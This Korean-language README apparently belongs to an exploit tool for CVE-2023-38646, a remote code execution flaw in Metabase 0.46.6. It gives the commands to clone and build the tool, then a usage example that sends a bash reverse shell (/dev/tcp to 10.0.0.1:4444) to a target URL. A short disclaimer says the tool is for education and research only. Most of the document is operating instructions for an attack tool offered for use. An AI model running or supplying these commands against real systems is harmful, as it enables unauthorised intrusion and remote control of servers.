
CVE-2023-38646에 대한 Metabase 0.46.6의 익스플로잇으로, 조작된 요청과 셋업 토큰 검색을 통해 원격 코드 실행을 가능하게 합니다.
CVE-2023-38646 Metabase 0.46.6 익스플로잇
이 도구는 소프트웨어 플랫폼의 취약점(CVE-2023-38646)을 악용합니다. 이 익스플로잇은 잘못 처리된 데이터베이스 연결 문자열을 이용하여 조작된 요청을 통해 원격 코드 실행을 가능하게 합니다.
이 도구는:
저장소를 클론합니다:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: 스캔 및 악용할 플랫폼의 URL. COMMAND: 대상에서 실행할 명령어. PROXY_URL (선택 사항): 프록시 서버의 URL (예: http://127.0.0.1:8080). 제공하지 않으면 프록시가 사용되지 않습니다.
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
이 도구는 교육 및 연구 목적으로만 제공됩니다. 대상을 스캔하거나 악용하기 전에 항상 적절한 권한이 있는지 확인하십시오. 이 도구의 오용은 개발자의 의도에 반하며 불법이 될 수 있습니다.
피드백, 버그 또는 기능 요청이 있으면 언제든지 이슈를 열어 주십시오. 풀 리퀘스트는 언제나 환영합니다!